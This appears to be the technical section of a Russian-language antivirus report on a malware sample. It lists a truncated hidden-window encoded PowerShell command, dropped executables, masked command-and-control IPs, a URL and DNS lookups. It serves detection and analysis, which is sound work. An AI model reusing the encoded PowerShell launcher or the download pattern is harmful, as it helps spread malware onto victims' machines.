Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAGEAZQBwAHQAbwB1AHAAbQBvAHoAcQB1AGEAcQB1AGcAdQByAD0AJwBnAGEAaQByAGYAbwBvAHYAdwBpAGEAdABoAHQAYQBlAGcAcABvAHUAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6AD...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\677.exe
- %WINDIR%\syswow64\ndadmin\pla.exe
- %HOMEPATH%\677.exe в %WINDIR%\syswow64\ndadmin\pla.exe
- '10#.#17.53.230':443
- '21#.#1.142.238':8080
- http://21#.##.142.238:8080/XUGSxrf/ojHtF/APfdvATHVtMD3d5fS/ERXM1m/ via 21#.#1.142.238
- DNS ASK to###meus.com
- DNS ASK cp##s.net
- DNS ASK ty##s2c.com
- DNS ASK th####erservice.com
- DNS ASK ss##e.com
- '%HOMEPATH%\677.exe'
- '%WINDIR%\syswow64\ndadmin\pla.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAGEAZQBwAHQAbwB1AHAAbQBvAHoAcQB1AGEAcQB1AGcAdQByAD0AJwBnAGEAaQByAGYAbwBvAHYAdwBpAGEAdABoAHQAYQBlAGcAcABvAHUAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6AD...' (со скрытым окном)